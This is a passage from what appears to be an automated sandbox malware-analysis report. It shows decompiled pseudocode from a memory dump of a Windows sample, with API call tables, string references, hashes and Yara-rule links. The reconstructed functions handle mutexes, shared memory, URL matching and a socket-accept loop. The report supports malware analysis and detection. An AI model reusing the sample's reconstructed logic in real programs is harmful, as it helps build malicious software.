													if(_t98 == 0) {
														goto L1;
													} else {
														_t132 = GetDC(0);
														if(_t132 != 0) {
															_t100 = CreateCompatibleDC(_t132);
															_t133[0x55] = _t100;
															if(_t100 != 0) {
																_t102 = CreateCompatibleBitmap(_t132, 1, 1);
																_t133[0x57] = _t102;
																if(_t102 != 0) {
																	_t103 = SelectObject(_t133[0x55], _t102);
																	_t133[0x56] = _t103;
																	if(_t103 != 0) {
																		_t104 = 1;
																	}
																}
															}
															ReleaseDC(0, _t132);
														}
														goto L22;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x00426210
0x00426222
0x00426227
0x0042622d
0x00426233
0x00426247
0x0042626a
0x00426274
0x0042627a
0x0042627f
0x00000000
0x00426281
0x00426285
0x004262a9
0x004262bb
0x004262c1
0x004262c6
0x00000000
0x004262cc
0x004262d0
0x004262f4
0x00426304
0x0042630a
0x0042630f
0x00000000
0x00426315
0x00426321
0x00426339
0x0042633f
0x00426343
0x00000000
0x00426349
0x0042634f
0x00426357
0x00000000
0x0042635d
0x0042635d
0x00426366
0x00426369
0x00426371
0x00426375
0x004264de
0x004264e7
0x0042637b
0x0042637d
0x00426380
0x0042638f
0x00426392
0x004263a0
0x004263a7
0x004263be
0x004263a9
0x004263a9
0x004263ab
0x004263ad
0x004263b5
0x004263b7
0x004263b7
0x004263c3
0x004263c6
0x004263d0
0x00000000
0x004263d6
0x004263d6
0x004263de
0x004263e2
0x004263e8
0x004263ec
0x004263f2
0x004263f7
0x004263f7
0x004263fa
0x004263fd
0x00426402
0x0042640b
0x00000000
0x00426411
0x00426418
0x0042641a
0x00426423
0x0042642f
0x00426433
0x0042644c
0x00426450
0x00426453
0x00426464
0x00426475
0x0042647b
0x00426483
0x00000000
0x00426489
0x00426491
0x00426495
0x00426498
0x0042649e
0x004264a6
0x004264ad
0x004264af
0x004264b7
0x004264c1
0x004264c7
0x004264cf
0x004264d1
0x004264d1
0x004264cf
0x004264b7
0x004264d6
0x004264d6
0x00000000
0x00426495
0x00426483
0x0042640b
0x004263d0
0x00426375
0x00426357
0x00426343
0x0042630f
0x004262c6
0x00426235
0x00426235
0x00426240
0x00426240

APIs

TlsAlloc.KERNEL32(0042EEA0,00000000,0000018C,00000000,77E49EB0,00000000), ref: 00426227
RegisterWindowMessageW.USER32(?,?,?,00000000), ref: 00426274
CreateEventW.KERNEL32(0042E930,00000001,00000000,?,?,?,00000001), ref: 004262BB
CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,00000001), ref: 00426304
CreateFileMappingW.KERNEL32(00000000,0042E930,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00426339
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0042634F
GetDC.USER32(00000000), ref: 0042636B
GetDeviceCaps.GDI32(00000000,00000008), ref: 0042638A
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00426392

Strings

pB, xrefs: 00426265
pB, xrefs: 004262A4
pB, xrefs: 004262EF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocEventMappingMessageMutexRegisterViewWindow
String ID: pB$pB$pB
API String ID: 2611066365-338011802
Opcode ID: ca055e7e8e6dbfaad50c1aff091f266435f75ee0aa6256b1a8504b8268de40b5
Instruction ID: e33113966422c0ab35d2d39a44073a2280f2bf20333fc5f0abbe02da57e1ab56
Opcode Fuzzy Hash: ca055e7e8e6dbfaad50c1aff091f266435f75ee0aa6256b1a8504b8268de40b5
Instruction Fuzzy Hash: 1B71C571640314AFD320EF61EC45FABB7E8EB85700F40492FF69296290D778E488CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00424ED0, Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 483
memorysynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424ED0() {
				void* __ebx;
				intOrPtr __edi;
				void* __esi;
				void* _t133;
				void* _t134;
				intOrPtr _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t145;
				void* _t149;
				int _t155;
				void* _t159;
				char _t161;
				void* _t163;
				void* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t177;
				void* _t180;
				void* _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				intOrPtr _t191;
				signed int _t193;
				long _t196;
				void* _t197;
				void* _t198;
				void* _t206;
				signed int _t210;
				intOrPtr _t212;
				signed int _t214;
				intOrPtr _t216;
				void* _t222;
				void* _t226;
				intOrPtr _t227;
				signed char _t233;
				intOrPtr _t235;
				struct _SYSTEMTIME _t240;
				void* _t243;
				intOrPtr _t245;
				signed char _t249;
				intOrPtr _t253;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t265;
				intOrPtr _t268;
				void* _t272;
				intOrPtr _t277;
				void* _t278;
				intOrPtr _t281;
				void* _t282;
				void* _t283;

				_t281 =  *((intOrPtr*)(_t283 + 0x2e4));
				_t210 = 0;
				 *(_t283 + 0x1c) = 0;
				 *((char*)(_t283 + 0x1b)) = 0xff;
				EnterCriticalSection(0x42ee7c);
				_t215 =  *0x42ee98;
				if( *0x42ee98 != 0 &&  *0x42ee94 != 0 && E00424250(_t215, 0,  *((intOrPtr*)(_t281 + 8)),  *((intOrPtr*)(_t281 + 0xc))) != 0) {
					_t196 = E0040C330();
					 *(_t283 + 0x1c) = _t196;
					if(_t196 != 0) {
						_push( *0x42ee94);
						_push(_t283 + 0x20);
						_push(4);
						if(E004242F0(0) == 0) {
							E004107C0( *(_t283 + 0x1c));
							_t206 =  *0x42d420; // 0x0
							ReleaseMutex(_t206);
							CloseHandle(_t206);
						} else {
							E0040C3F0( *(_t283 + 0x1c));
						}
					}
					_t197 =  *0x42ee94;
					if(_t197 != 0) {
						HeapFree( *0x42e6d4, 0, _t197);
					}
					_t198 =  *0x42ee98;
					if(_t198 != 0) {
						HeapFree( *0x42e6d4, 0, _t198);
					}
					 *0x42ee94 = 0;
					 *0x42ee98 = 0;
				}
				LeaveCriticalSection(0x42ee7c);
				_t267 =  *((intOrPtr*)(_t281 + 0x40));
				if( *((intOrPtr*)(_t281 + 0x40)) == 0) {
					L49:
					__eflags = _t210 & 0x00000001;
					if((_t210 & 0x00000001) == 0) {
						_t234 =  *(_t281 + 0x44);
						__eflags =  *(_t281 + 0x44);
						if(__eflags != 0) {
							_push(0);
							_push( *((intOrPtr*)(_t281 + 0xc)));
							_push( *((intOrPtr*)(_t281 + 8)));
							_t183 = E00424660(3, _t234, __eflags);
							__eflags = _t183;
							if(_t183 != 0) {
								_t210 = _t210 | 0x00000001;
								__eflags = _t210;
								 *(_t283 + 0x18) = _t210;
							}
						}
					}
					__eflags =  *((intOrPtr*)(_t281 + 0x20)) - 0x21;
					if( *((intOrPtr*)(_t281 + 0x20)) < 0x21) {
						L62:
						_t133 =  *(_t281 + 0x2c);
						 *(_t283 + 0x1c) = 0;
						__eflags = _t133;
						if(_t133 == 0) {
							L67:
							_t134 =  *(_t281 + 0x34);
							__eflags = _t134;
							if(_t134 == 0) {
								L76:
								_t135 =  *((intOrPtr*)(_t283 + 0x17));
								__eflags = _t135 - 0xff;
								if(_t135 != 0xff) {
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										L83:
										__eflags = _t210 & 0x00000008;
										if((_t210 & 0x00000008) == 0) {
											L118:
											_t136 =  *(_t283 + 0x1c);
											__eflags = _t136;
											if(_t136 != 0) {
												HeapFree( *0x42e6d4, 0, _t136);
											}
											__eflags = _t210 & 0x00000001;
											if((_t210 & 0x00000001) == 0) {
												_t268 =  *((intOrPtr*)(_t283 + 0x2ec));
												_push(_t268);
												_t138 = E00424750();
												__eflags = _t138;
												if(_t138 != 0) {
													_t210 = _t210 | 0x00000002;
													__eflags = _t210;
												}
												__eflags = _t210 & 0x00000010;
												if((_t210 & 0x00000010) != 0) {
													_push(_t268);
													_t139 = E00424C30();
													__eflags = _t139;
													if(_t139 != 0) {
														_t210 = _t210 | 0x00000004;
														__eflags = _t210;
													}
												}
											}
											return _t210;
										}
										_t216 = _t281;
										_t141 =  *(_t216 + 0x28);
										 *((char*)(_t283 + 0x17)) = 0;
										__eflags =  *(_t216 + 0x28);
										if( *(_t216 + 0x28) != 0) {
											__eflags = _t210 & 0x00000010;
											if((_t210 & 0x00000010) == 0) {
												__eflags =  *(_t216 + 0x20);
												if( *(_t216 + 0x20) != 0) {
													L117:
													_t210 = _t210 & 0xfffffff7;
													__eflags = _t210;
													goto L118;
												}
												_t259 = _t283 + 0x20;
												E004240C0(0xc, _t259);
												_t145 = HeapAlloc( *0x42e6d4, 8, 0xe);
												__eflags = _t145;
												if(_t145 == 0) {
													L100:
													_t282 = _t145;
													L101:
													__eflags = _t282;
													if(_t282 == 0) {
														goto L117;
													}
													E004237D0(_t283 + 0x20);
													_t260 = E00410AA0( *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x2ec)) + 8)), 0,  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x2ec)) + 0xc)));
													__eflags = _t260;
													if(_t260 != 0) {
														_t240 = _t283 + 0x94;
														E00410870(_t148, _t240, 0, 0x3c);
														_t212 =  *((intOrPtr*)(_t283 + 0x2ec));
														 *((intOrPtr*)(_t283 + 0x9c)) = 0x3c;
														_t155 = InternetCrackUrlA( *(_t212 + 8),  *(_t212 + 0xc), 0, _t240);
														__eflags = _t155 - 1;
														if(_t155 == 1) {
															_t111 = _t155 + 9; // 0x9
															E00424100(_t111, _t283 + 0x110);
															E00424100(0xd, _t283 + 0x2c);
															_t272 =  *(_t283 + 0x1c);
															__eflags = _t272;
															if(_t272 == 0) {
																_t272 = 0x4032e8;
															}
															_t243 =  *(_t283 + 0x20);
															__eflags = _t243;
															if(_t243 == 0) {
																_t243 = 0x4032e8;
															}
															_t222 =  *(_t212 + 0x10);
															__eflags = _t222;
															if(_t222 == 0) {
																_t222 = 0x404afc;
															}
															__eflags =  *(_t283 + 0x18) & 0x00000001;
															_t159 = _t283 + 0x2c;
															if(( *(_t283 + 0x18) & 0x00000001) == 0) {
																_t159 = 0x4032e8;
															}
															_push(_t282);
															_push(_t272);
															_push(_t243);
															_push(_t222);
															__eflags =  *((intOrPtr*)(_t283 + 0xa8)) - 4;
															_push(_t159);
															__eflags = ( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb;
															_t161 = E0040D910(( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb, ( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb, _t260, 0, _t283 + 0x128, _t260);
															_t283 = _t283 + 0x28;
															 *((char*)(_t283 + 0x17)) = _t161;
														}
														HeapFree( *0x42e6d4, 0, _t260);
													}
													_t149 =  *(_t283 + 0x20);
													__eflags = _t149;
													if(_t149 != 0) {
														HeapFree( *0x42e6d4, 0, _t149);
													}
													HeapFree( *0x42e6d4, 0, _t282);
													__eflags =  *((char*)(_t283 + 0x17));
													_t210 =  *(_t283 + 0x18);
													if( *((char*)(_t283 + 0x17)) != 0) {
														goto L118;
													} else {
														goto L117;
													}
												}
												_push(9);
												_t226 = _t259;
												L99:
												_push(_t226);
												_push(_t145);
												_t145 = E00410820();
												goto L100;
											}
											_t282 = E00410E10(_t141,  *((intOrPtr*)(_t216 + 0x24)));
											__eflags = _t282;
											if(_t282 == 0) {
												goto L117;
											}
											_t245 =  *((intOrPtr*)(_t283 + 0x2ec));
											_t163 = 0;
											__eflags =  *(_t245 + 0x28);
											if( *(_t245 + 0x28) <= 0) {
												goto L101;
											} else {
												goto L90;
											}
											do {
												L90:
												_t227 =  *((intOrPtr*)(_t163 + _t282));
												__eflags = _t227 - 0x26;
												if(_t227 != 0x26) {
													__eflags = _t227 - 0x2b;
													if(_t227 == 0x2b) {
														 *((char*)(_t163 + _t282)) = 0x20;
													}
												} else {
													 *((char*)(_t163 + _t282)) = 0xa;
												}
												_t163 = _t163 + 1;
												__eflags = _t163 -  *(_t245 + 0x28);
											} while (_t163 <  *(_t245 + 0x28));
											goto L101;
										}
										_t261 = _t283 + 0x20;
										E004240C0(0xb, _t261);
										_t145 = HeapAlloc( *0x42e6d4, 8, 0xc);
										__eflags = _t145;
										if(_t145 == 0) {
											goto L100;
										}
										_push(7);
										_t226 = _t261;
										goto L99;
									}
									L82:
									_t210 = _t210 | 0x00000008;
									__eflags = _t210;
									 *(_t283 + 0x18) = _t210;
									goto L83;
								}
								__eflags =  *((char*)(_t281 + 0x18)) - 1;
								if( *((char*)(_t281 + 0x18)) != 1) {
									L79:
									__eflags = _t210 & 0x00000020;
									if((_t210 & 0x00000020) == 0) {
										goto L83;
									}
									goto L82;
								}
								__eflags =  *(_t281 + 0x28);
								if( *(_t281 + 0x28) > 0) {
									goto L82;
								}
								goto L79;
							}
							__eflags =  *_t134;
							if( *_t134 == 0) {
								goto L76;
							}
							E00424100(0x12, _t283 + 0xc8);
							_t168 = E00411DC0(__eflags, _t283 + 0x24, _t283 + 0xc8,  *(_t281 + 0x34));
							_t283 = _t283 + 0xc;
							L70:
							__eflags = _t168;
							if(_t168 > 0) {
								_t262 =  *(_t283 + 0x1c);
								_t169 = E00412560(_t262, _t168 + _t168);
								__eflags =  *0x42ee14 - _t169;
								if( *0x42ee14 != _t169) {
									_t210 = _t210 | 0x00000020;
									__eflags = _t210;
									 *0x42ee14 = _t169;
									 *(_t283 + 0x18) = _t210;
								} else {
									__eflags = _t262;
									if(_t262 != 0) {
										HeapFree( *0x42e6d4, 0, _t262);
									}
									 *(_t283 + 0x1c) = 0;
								}
							}
							goto L76;
						}
						__eflags =  *_t133;
						if( *_t133 == 0) {
							goto L67;
						}
						_t171 =  *(_t281 + 0x30);
						__eflags = _t171;
						if(_t171 == 0) {
							goto L67;
						}
						__eflags =  *_t171;
						if( *_t171 == 0) {
							goto L67;
						}
						E00424100(0x11, _t283 + 0x178);
						_push( *(_t281 + 0x30));
						_t168 = E00411DC0(__eflags, _t283 + 0x28, _t283 + 0x178,  *(_t281 + 0x2c));
						_t283 = _t283 + 0x10;
						goto L70;
					} else {
						E004240C0(0x10, _t283 + 0x2c);
						_t277 =  *((intOrPtr*)(_t281 + 0x1c));
						_t177 = 0;
						while(1) {
							_t233 =  *((intOrPtr*)(_t277 + _t177));
							_t249 =  *((intOrPtr*)(_t283 + _t177 + 0x2c));
							__eflags = _t233 - _t249;
							if(_t233 != _t249) {
								break;
							}
							_t177 = _t177 + 1;
							__eflags = _t177 - 0x21;
							if(_t177 < 0x21) {
								continue;
							}
							L59:
							_t180 =  *((intOrPtr*)(_t277 + 0x21));
							__eflags = _t180 - 0x3b;
							if(_t180 == 0x3b) {
								L61:
								_t210 = _t210 | 0x00000010;
								__eflags = _t210;
								 *(_t283 + 0x18) = _t210;
								goto L62;
							}
							__eflags = _t180;
							if(_t180 != 0) {
								goto L62;
							}
							goto L61;
						}
						__eflags = (_t233 & 0x000000ff) != (_t249 & 0x000000ff);
						if((_t233 & 0x000000ff) != (_t249 & 0x000000ff)) {
							goto L62;
						}
						goto L59;
					}
				}
				_t265 = E00418BD0(0x4e25, 0x10000000, _t267);
				if(_t265 == 0) {
					L48:
					_t210 =  *(_t283 + 0x18);
					goto L49;
				}
				_t278 = E00418C20(_t265);
				 *(_t283 + 0x20) = _t278;
				if(_t278 == 0) {
					goto L48;
				}
				_t186 =  *((intOrPtr*)(_t265 + 0xc));
				if(_t186 < 2 ||  *((char*)(_t278 + _t186 - 1)) != 0 ||  *((char*)(_t278 + _t186 - 2)) != 0) {
					L47:
					HeapFree( *0x42e6d4, 0, _t278);
					goto L48;
				} else {
					L19:
					while(1) {
						if( *(_t278 + 1) == 0) {
							L41:
							_t188 = 0;
							__eflags = 0;
							goto L42;
							do {
								do {
									L42:
									_t278 = _t278 + 1;
									__eflags =  *((char*)(_t278 - 1));
								} while ( *((char*)(_t278 - 1)) != 0);
								__eflags =  *_t278;
								if( *_t278 == 0) {
									L46:
									_t278 =  *(_t283 + 0x20);
									goto L47;
								}
								_t188 = _t188 + 1;
								__eflags = _t188 - 1;
							} while (_t188 != 1);
							continue;
						}
						_t190 =  *_t278 + 0xffffffdf;
						if(_t190 > 0x3d) {
							L33:
							_t214 = 0;
							L24:
							_t235 =  *((intOrPtr*)(_t281 + 0xc));
							_t253 =  *((intOrPtr*)(_t281 + 8));
							_t191 = 0;
							 *(_t283 + 0x2c) = 0x2a23;
							 *(_t283 + 0x30) = _t278;
							if(_t278 == 0 ||  *_t278 == 0) {
								L27:
								 *((intOrPtr*)(_t283 + 0x3c)) = _t235;
								 *((intOrPtr*)(_t283 + 0x34)) = _t191;
								 *((intOrPtr*)(_t283 + 0x38)) = _t253;
								 *((intOrPtr*)(_t283 + 0x48)) = 1;
								if(E00412090(_t283 + 0x2c) == 0) {
									goto L41;
								}
								_t193 = _t214;
								if(_t193 > 4) {
									L40:
									__eflags = _t214 - 2;
									if(_t214 != 2) {
										goto L46;
									}
									goto L41;
								}
								switch( *((intOrPtr*)(_t193 * 4 +  &M00425544))) {
									case 0:
										 *((char*)(__esp + 0x17)) = 0;
										goto L40;
									case 1:
										L39:
										 *((char*)(__esp + 0x17)) = 1;
										goto L40;
									case 2:
										__esp + 0x58 = E00410870(__esp + 0x58, __esp + 0x58, 0, 0x3c);
										__eax =  *(__ebp + 0xc);
										__edx = __esp + 0x50;
										__ecx = __esp + 0x1e4;
										 *(__esp + 0x68) = __esp + 0x1e4;
										__ecx =  *(__ebp + 8);
										 *((intOrPtr*)(__esp + 0x60)) = 0x3c;
										 *((intOrPtr*)(__esp + 0x74)) = __edi;
										__eax = InternetCrackUrlA(__ecx,  *(__ebp + 0xc), 0, __esp + 0x50);
										__eflags = __eax - 1;
										if(__eax == 1) {
											__eflags =  *(__esp + 0x64);
											if( *(__esp + 0x64) > 0) {
												__eax = __esp + 0x1e0;
												__eax = E00423760(__esp + 0x1e0);
											}
										}
										goto L40;
									case 3:
										_t44 = __esp + 0x18;
										 *_t44 =  *(__esp + 0x18) | 0x00000001;
										__eflags =  *_t44;
										goto L39;
								}
							} else {
								do {
									_t191 = _t191 + 1;
								} while ( *((char*)(_t191 + _t278)) != 0);
								goto L27;
							}
						}
						_t18 = _t190 + 0x425504; // 0x4032e8
						switch( *((intOrPtr*)(( *_t18 & 0x000000ff) * 4 +  &M004254F0))) {
							case 0:
								_t214 = 1;
								goto L23;
							case 1:
								goto L23;
							case 2:
								_t214 = 2;
								goto L23;
							case 3:
								L23:
								_t278 = _t278 + 1;
								goto L24;
							case 4:
								goto L33;
						}
					}
				}
			}

0x00424ed8
0x00424ee1
0x00424ee8
0x00424eec
0x00424ef1
0x00424ef7
0x00424f05
0x00424f2e
0x00424f33
0x00424f39
0x00424f40
0x00424f45
0x00424f46
0x00424f4f
0x00424f61
0x00424f66
0x00424f6e
0x00424f75
0x00424f51
0x00424f56
0x00424f56
0x00424f4f
0x00424f7b
0x00424f84
0x00424f8e
0x00424f8e
0x00424f90
0x00424f97
0x00424fa2
0x00424fa2
0x00424fa4
0x00424faa
0x00424faa
0x00424fb5
0x00424fbb
0x00424fc0
0x00425147
0x00425147
0x0042514a
0x0042514c
0x0042514f
0x00425151
0x00425159
0x0042515b
0x0042515c
0x00425162
0x00425167
0x00425169
0x0042516b
0x0042516b
0x0042516e
0x0042516e
0x00425169
0x00425151
0x00425172
0x00425176
0x004251bf
0x004251bf
0x004251c2
0x004251ca
0x004251cc
0x0042520c
0x0042520c
0x0042520f
0x00425211
0x0042527f
0x0042527f
0x00425283
0x00425285
0x0042529a
0x0042529c
0x004252a5
0x004252a5
0x004252a8
0x0042549d
0x0042549d
0x004254a1
0x004254a3
0x004254af
0x004254af
0x004254b5
0x004254b8
0x004254ba
0x004254c1
0x004254c2
0x004254c7
0x004254c9
0x004254cb
0x004254cb
0x004254cb
0x004254ce
0x004254d1
0x004254d3
0x004254d4
0x004254d9
0x004254db
0x004254dd
0x004254dd
0x004254dd
0x004254db
0x004254d1
0x004254ec
0x004254ec
0x004252ae
0x004252b0
0x004252b3
0x004252b8
0x004252ba
0x004252e9
0x004252ec
0x0042532f
0x00425333
0x0042549a
0x0042549a
0x0042549a
0x00000000
0x0042549a
0x00425339
0x00425342
0x00425351
0x00425357
0x00425359
0x00425366
0x00425366
0x00425368
0x00425368
0x0042536a
0x00000000
0x00000000
0x00425374
0x0042538e
0x00425390
0x00425392
0x0042539c
0x004253a4
0x004253a9
0x004253bd
0x004253c8
0x004253ce
0x004253d1
0x004253de
0x004253e1
0x004253ef
0x004253f4
0x004253f8
0x004253fa
0x004253fc
0x004253fc
0x00425401
0x00425405
0x00425407
0x00425409
0x00425409
0x0042540e
0x00425411
0x00425413
0x00425415
0x00425415
0x0042541a
0x0042541f
0x00425423
0x00425425
0x00425425
0x0042542a
0x0042542b
0x0042542c
0x0042542d
0x00425430
0x00425438
0x00425448
0x0042544c
0x00425451
0x00425454
0x00425454
0x00425462
0x00425462
0x00425468
0x0042546c
0x0042546e
0x00425479
0x00425479
0x00425489
0x0042548f
0x00425494
0x00425498
0x00000000
0x00000000
0x00000000
0x00000000
0x00425498
0x0042535b
0x0042535d
0x0042535f
0x0042535f
0x00425360
0x00425361
0x00000000
0x00425361
0x004252f8
0x004252fa
0x004252fc
0x00000000
0x00000000
0x00425302
0x00425309
0x0042530b
0x0042530e
0x00000000
0x00000000
0x00000000
0x00000000
0x00425310
0x00425310
0x00425310
0x00425313
0x00425316
0x0042531e
0x00425321
0x00425323
0x00425323
0x00425318
0x00425318
0x00425318
0x00425327
0x00425328
0x00425328
0x00000000
0x0042532d
0x004252bc
0x004252c5
0x004252d5
0x004252db
0x004252dd
0x00000000
0x00000000
0x004252e3
0x004252e5
0x00000000
0x004252e5
0x0042529e
0x0042529e
0x0042529e
0x004252a1
0x00000000
0x004252a1
0x00425287
0x0042528b
0x00425293
0x00425293
0x00425296
0x00000000
0x00000000
0x00000000
0x00425298
0x0042528d
0x00425291
0x00000000
0x00000000
0x00000000
0x00425291
0x00425213
0x00425216
0x00000000
0x00000000
0x00425224
0x00425235
0x0042523a
0x0042523d
0x0042523d
0x0042523f
0x00425241
0x00425248
0x0042524d
0x00425253
0x00425273
0x00425273
0x00425276
0x0042527b
0x00425255
0x00425255
0x00425257
0x00425263
0x00425263
0x00425269
0x00425269
0x00425253
0x00000000
0x0042523f
0x004251ce
0x004251d2
0x00000000
0x00000000
0x004251d4
0x004251d7
0x004251d9
0x00000000
0x00000000
0x004251db
0x004251df
0x00000000
0x00000000
0x004251ed
0x004251f8
0x00425202
0x00425207
0x00000000
0x00425178
0x00425181
0x00425186
0x00425189
0x00425190
0x00425190
0x00425193
0x00425197
0x00425199
0x00000000
0x00000000
0x0042519b
0x0042519c
0x0042519f
0x00000000
0x00000000
0x004251ad
0x004251ad
0x004251b0
0x004251b2
0x004251b8
0x004251b8
0x004251b8
0x004251bb
0x00000000
0x004251bb
0x004251b4
0x004251b6
0x00000000
0x00000000
0x00000000
0x004251b6
0x004251a9
0x004251ab
0x00000000
0x00000000
0x00000000
0x004251ab
0x00425176
0x00424fd5
0x00424fd9
0x00425143
0x00425143
0x00000000
0x00425143
0x00424fe4
0x00424fe6
0x00424fec
0x00000000
0x00000000
0x00424ff2
0x00424ff8
0x00425133
0x0042513d
0x00000000
0x00425014
0x00000000
0x00425020
0x00425024
0x00425116
0x00425116
0x00425116
0x00425116
0x00425118
0x00425118
0x00425118
0x00425118
0x00425119
0x00425119
0x0042511f
0x00425122
0x0042512f
0x0042512f
0x00000000
0x0042512f
0x00425124
0x00425125
0x00425125
0x00000000
0x00425118
0x0042502d
0x00425033
0x004250a8
0x004250a8
0x00425046
0x00425046
0x00425049
0x0042504c
0x0042504e
0x00425055
0x0042505b
0x00425068
0x00425068
0x00425070
0x00425074
0x00425078
0x00425087
0x00000000
0x00000000
0x0042508d
0x00425093
0x00425111
0x00425111
0x00425114
0x00000000
0x00000000
0x00000000
0x00425114
0x00425095
0x00000000
0x004250ac
0x00000000
0x00000000
0x0042510c
0x0042510c
0x00000000
0x00000000
0x004250bc
0x004250c1
0x004250c4
0x004250c9
0x004250d2
0x004250d6
0x004250db
0x004250e3
0x004250e7
0x004250ed
0x004250f0
0x004250f2
0x004250f7
0x004250f9
0x00425100
0x00425100
0x004250f7
0x00000000
0x00000000
0x00425107
0x00425107
0x00425107
0x00000000
0x00000000
0x00425061
0x00425061
0x00425061
0x00425062
0x00000000
0x00425061
0x0042505b
0x00425035
0x0042503c
0x00000000
0x00425043
0x00000000
0x00000000
0x00000000
0x00000000
0x0042509c
0x00000000
0x00000000
0x00425045
0x00425045
0x00000000
0x00000000
0x00000000
0x00000000
0x0042503c
0x00425020

APIs

EnterCriticalSection.KERNEL32 ref: 00424EF1
ReleaseMutex.KERNEL32(00000000,00000004,?,?,00000000,00000000), ref: 00424F6E
CloseHandle.KERNEL32(00000000), ref: 00424F75

Part of subcall function 0040C3F0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 0040C45C
Part of subcall function 0040C3F0: ReleaseMutex.KERNEL32(00000000,00000000,00000000), ref: 0040C46A
Part of subcall function 0040C3F0: CloseHandle.KERNEL32(00000000), ref: 0040C471

HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424F8E
HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424FA2
LeaveCriticalSection.KERNEL32(0042EE7C), ref: 00424FB5
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004250E7
HeapFree.KERNEL32(?,00000000,00000000), ref: 0042513D

Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5

Strings

<, xrefs: 004250DB
#*, xrefs: 0042504E
<, xrefs: 004253BD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Mutex$CloseCriticalHandleReleaseSection$AllocCrackCreateEnterInternetLeaveObjectSingleWait
String ID: #*$<$<
API String ID: 2903975631-1731024930
Opcode ID: f2ba173abd883aa1127000e151f33096780171e73e68ede20f3b5f64b862bbec
Instruction ID: 166662a23442c4c50d67f2e484584385e9eee6219332d99c00bd2da81ed5d545
Opcode Fuzzy Hash: f2ba173abd883aa1127000e151f33096780171e73e68ede20f3b5f64b862bbec
Instruction Fuzzy Hash: 4902D130B047609FD720DF21E840BABB7A5AB95344F94456EF9849B391C778DC82CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00407188, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 118
networksynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00407188(long __eax, intOrPtr* __ebx, intOrPtr* __edi, intOrPtr* __ebp, int _a4, long _a8, intOrPtr _a20, void* _a24, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
				long _v28;
				char _v32;
				intOrPtr _v60;
				long _t27;
				intOrPtr _t34;
				void* _t35;
				void* _t41;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr* _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t60;
				intOrPtr* _t61;
				void* _t64;

				_t61 = __ebp;
				_t53 = __edi;
				_t42 = __ebx;
				_t27 = __eax;
				while(1) {
					_t56 = _a20;
					if(_t27 >= _t56) {
						break;
					}
					_t34 =  *((intOrPtr*)(_t64 + 0x38 + _t27 * 4));
					if(_t34 != _a44) {
						if(_t34 == _a36) {
							_a24 = _a32;
						}
					} else {
						_a24 = _a40;
					}
					_t35 = _a24;
					__imp__#1(_t35, 0, 0);
					_t60 = _t35;
					while(_t60 != 0xffffffff) {
						 *_t53(_t60, 0, 0);
						_a4 = 0;
						 *_t42(_t60, 0x8004667e,  &_a4, 4, 0, 0,  &_a44, 0, 0);
						_v32 = 1;
						 *_t61(_t60, 6, 1,  &_v32, 4);
						_t41 = CreateThread(0, 0x20000, E00406F20, _t60, 0,  &_v28);
						if(_t41 == 0) {
							L10:
							if(_t60 != 0xffffffff) {
								__imp__#22(_t60, 2);
								__imp__#3(_t60);
							}
						} else {
							_t41 = CloseHandle(_t41);
							if(_v32 == 0) {
								goto L10;
							}
						}
						__imp__#1(_v60, 0, 0);
						_t60 = _t41;
					}
					_t27 = WaitForMultipleObjects(_a8,  &_a44, 0, 0xffffffff);
					if(_t27 != 0) {
						continue;
					}
					break;
				}
				_t43 = _a48;
				_t57 = _a40;
				if(_t57 != 0xffffffff) {
					__imp__#22(_t57, 2);
					__imp__#3(_t57);
				}
				CloseHandle(_a44);
				_t58 = _a32;
				if(_t58 != 0xffffffff) {
					__imp__#22(_t58, 2);
					__imp__#3(_t58);
				}
				CloseHandle(_a36);
				ReleaseMutex(_t43);
				CloseHandle(_t43);
				return 0;
			}

0x00407188
0x00407188
0x00407188
0x00407188
0x00407190
0x00407190
0x00407196
0x00000000
0x00000000
0x0040719c
0x004071a4
0x004071b4
0x004071ba
0x004071ba
0x004071a6
0x004071aa
0x004071aa
0x004071be
